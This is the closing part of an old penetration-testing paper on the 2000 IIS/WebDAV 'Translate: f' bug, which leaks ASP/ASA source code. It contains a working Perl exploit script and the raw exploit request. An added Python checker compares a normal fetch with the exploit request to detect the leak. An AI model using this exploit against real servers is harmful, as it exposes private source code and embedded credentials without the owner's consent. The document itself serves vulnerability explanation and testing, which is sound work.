=============Translate:f Bug ====================
Daniel Docekal brought this issue up on BugTraq this summer, August 15, 2000
(www.securityfocus.com/bid/1578). The actual problem is with the WebDAV
implementation in Office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for an ASP/ASA or any other scriptable page and
adds "Translate: f" to the headers of the HTTP GET (headers are not part of the URL,
they are part of the HTTP request), they end up with the complete ASP/ASA source
code on Win2K without SP1 installed.
Translate: f is a legitimate header for WebDAV and is used by WebDAV
compatible clients and by FP2000 to get the file for editing.
Simply adding "translate:f" and placing "/" at the end of the request in an HTTP
GET will trigger the security bug.
It is a Win2K bug, but because FP2000 is installed on IIS 4.0, it is also an IIS 4.0
bug.
You can use the following Perl script to exploit this.
#!/usr/bin/perl
# Trans.pl - request a script file with the "Translate: f" header so that
# the unpatched WebDAV handler returns its source instead of executing it.
use strict;
use warnings;
use Socket;    # inet_aton, sockaddr_in, PF_INET, SOCK_STREAM

if (@ARGV < 2) {
    howto();
    exit;
}
my ($server, $cm) = @ARGV;
my $port = 80;
do_request();

sub do_request {
    # %5C is a URL-encoded backslash appended to the file name; together
    # with "Translate: f" it makes IIS hand the request to the WebDAV/FP
    # source handler. Headers are terminated with CRLF as HTTP requires.
    my $ver = "GET /$cm%5C HTTP/1.0\r\n"
            . "Host: $server\r\n"
            . "Accept: */*\r\n"
            . "Translate: f\r\n"
            . "\r\n";

    my $iaddr = inet_aton($server)            || die "Error: $!";
    my $paddr = sockaddr_in($port, $iaddr)    || die "Error: $!";
    my $proto = getprotobyname('tcp')         || die "Error: $!";
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
    connect(SOCK, $paddr)                      || die "Error: $!";
    send(SOCK, $ver, 0)                        || die "Can't send packet: $!";

    open(OUT, ">$server.txt") || die "Can't open $server.txt: $!";
    print "Dumping $cm to $server.txt \n";
    while (<SOCK>) {
        print OUT $_;    # write every line of the response, headers included
    }
    close OUT;
    close(SOCK);
}

sub howto {
    print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
If we call the script as Trans.pl, then we can get the ASA/ASP source code
as follows:
Trans.pl www.victim.com codetoview.asp
And there you go, you get the source code of codetoview.asp.
04- Conclusion
All the information I have given you has been widely used in the wild. However,
what I tried to do was just to collect all this information together so as to
check the security of our famous IIS 4.0 and 5.0. Whenever I encounter an IIS
web server during my pen-tests, I do check for these vulnerabilities, and
most of the time one of these works.
I hope that what I have written has helped you in some way. Thanks for reading
it; please continue to support me as I continue to release this sort of
paper. If you want to learn more, please check the mentioned people's web
sites for more details, and you can even write to me.
Peace in mind
Watch your servers in wild
(c)governmentsecurity.org
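The following is an added example, not part of the quoted paper or of the Perl script above. It shows the same "Translate: f" request as bytes on the wire and adds the check a scanner or a defender needs on top of the paper's script: the page is fetched once normally and once with the header plus the trailing %5C, and source disclosure is flagged only when the second response is a 200 whose body carries server-side ASP delimiters (<% or a runat=server script block) that the normally executed page does not. Comparing against the baseline avoids false positives on pages that legitimately echo such text. The host, path, and all three sample responses are constructed for the demo; only probe() touches the network, and the offline demo never calls it.

```python
"""Check whether a web server leaks script source when asked with the
WebDAV "Translate: f" header. Added example; sample responses are constructed."""
import re
import socket

# Server-side ASP markers that should never reach a client when the page executes.
ASP_SOURCE = re.compile(rb"<%|<script[^>]+runat\s*=\s*[\"']?server", re.I)


def build_request(host: str, path: str, translate: bool) -> bytes:
    """Build the raw HTTP/1.0 GET. With translate=True the target gets the
    trailing %5C (an encoded backslash) and the 'Translate: f' header, exactly
    as in the paper's Perl script; with translate=False it is a plain baseline."""
    path = path.lstrip("/")
    target = f"/{path}%5C" if translate else f"/{path}"
    lines = [f"GET {target} HTTP/1.0", f"Host: {host}", "Accept: */*"]
    if translate:
        lines.append("Translate: f")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def split_response(raw: bytes):
    """Return (status_code, body) from a raw HTTP response. A malformed
    response (no status line or no blank line after the headers) gives (0, b'')."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return 0, b""
    status_line = head.split(b"\r\n", 1)[0]
    m = re.match(rb"HTTP/\d\.\d (\d{3})", status_line)
    return (int(m.group(1)) if m else 0), body


def leaks_source(baseline: bytes, translated: bytes) -> bool:
    """True when the Translate:f response is a 200 containing ASP source
    markers that the baseline (normally executed) response does not contain."""
    _, b_body = split_response(baseline)
    t_code, t_body = split_response(translated)
    if t_code != 200:
        return False
    return bool(ASP_SOURCE.search(t_body)) and not ASP_SOURCE.search(b_body)


def probe(host: str, path: str, port: int = 80, timeout: float = 10.0) -> bool:
    """Live check (not used by the offline demo): fetch both variants and compare."""
    responses = []
    for translate in (False, True):
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request(host, path, translate))
            chunks = []
            chunk = s.recv(4096)
            while chunk:
                chunks.append(chunk)
                chunk = s.recv(4096)
        responses.append(b"".join(chunks))
    return leaks_source(responses[0], responses[1])


# Constructed sample responses: the page as executed, the same page's source
# as an unpatched server returns it, and what a patched server answers.
EXECUTED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><body>Welcome, guest</body></html>")
DISCLOSED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             b"<%\r\nSet conn = Server.CreateObject(\"ADODB.Connection\")\r\n"
             b"conn.Open \"DSN=shop;UID=sa;PWD=secret\"\r\n%>\r\n<html>")
PATCHED = b"HTTP/1.1 404 Object Not Found\r\nContent-Type: text/html\r\n\r\n<html>"

if __name__ == "__main__":
    print(build_request("www.victim.com", "codetoview.asp", True).decode())
    print("unpatched server leaks source:", leaks_source(EXECUTED, DISCLOSED))  # True
    print("patched server leaks source:  ", leaks_source(EXECUTED, PATCHED))    # False
```

For a live test, probe("www.victim.com", "codetoview.asp") sends both requests and returns the same boolean; the status check matters because a patched server typically answers the %5C variant with a 404 rather than a 200, and the baseline comparison keeps a page that happens to print "<%" in its normal output from being reported as a leak.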